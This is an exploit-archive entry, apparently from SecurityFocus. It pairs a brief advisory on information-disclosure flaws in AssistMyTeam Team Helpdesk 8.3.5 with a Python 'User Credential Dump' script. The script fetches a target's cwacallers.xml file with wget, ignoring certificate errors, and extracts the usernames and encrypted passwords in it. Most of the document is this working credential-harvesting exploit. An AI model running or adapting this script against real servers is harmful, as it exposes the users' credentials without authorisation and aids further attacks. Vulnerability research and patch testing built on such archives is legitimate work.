29 lines
No EOL
957 B
Python
Executable file
29 lines
No EOL
957 B
Python
Executable file
source: https://www.securityfocus.com/bid/67271/info
|
|
|
|
AssistMyTeam Team Helpdesk is prone to multiple information-disclosure vulnerabilities.
|
|
|
|
Successfully exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks.
|
|
|
|
Team Helpdesk 8.3.5 is vulnerable; other versions may also be affected.
|
|
|
|
#!/usr/bin/python
|
|
|
|
import sys
|
|
import re
|
|
import os
|
|
import subprocess
|
|
|
|
print "This is an User Credential Dump for Team Helpdesk Customer Wev Service 8.3.5 (and prior) by bhamb.\n"
|
|
print "Send any comment to ccb3b72@gmail.com\n"
|
|
|
|
if len(sys.argv) != 2:
|
|
print('Usage: user_cred_dump.py https://Hostname.com')
|
|
exit(1)
|
|
|
|
hostname=sys.argv[1]+"/cws/bin/cwacallers.xml"
|
|
print hostname
|
|
subprocess.Popen(['wget', '--no-check-certificate',hostname]).communicate()
|
|
|
|
print "The following usernames and encrypted password were found.\n"
|
|
cmd="cat cwacallers.xml | grep '@' | cut -d'\"' -f4,6 | sed 's/\"/:/g' "
|
|
test=os.system(cmd) |